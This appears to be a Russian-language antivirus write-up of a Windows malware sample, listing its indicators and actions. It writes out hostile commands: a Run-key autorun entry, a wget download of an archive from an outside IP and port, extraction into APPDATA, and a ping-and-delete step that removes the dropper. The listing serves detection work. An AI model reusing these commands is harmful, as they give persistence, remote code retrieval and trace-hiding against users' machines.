Техническая информация
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'cygwin' = 'wscript "%APPDATA%\System\cygwin\run.vbs"'
- %APPDATA%\system\wget.exe
- %APPDATA%\system\7z.exe
- %APPDATA%\system\7z.dll
- '11#.#8.4.133':8000
- ClassName: 'MS_WINHELP' WindowName: ''
- '%APPDATA%\system\wget.exe' 112.78.4.133:8000/cygwin.7z -O "%APPDATA%\System\cygwin.7z" -c
- '%APPDATA%\system\7z.exe' x -o"%APPDATA%\System\" "%APPDATA%\System\cygwin.7z"
- '%WINDIR%\syswow64\cmd.exe' /C ping -n 3 127.0.0.1 & del Up.exe' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /C ping -n 3 127.0.0.1 & del Up.exe
- '%WINDIR%\syswow64\ping.exe' -n 3 127.0.0.1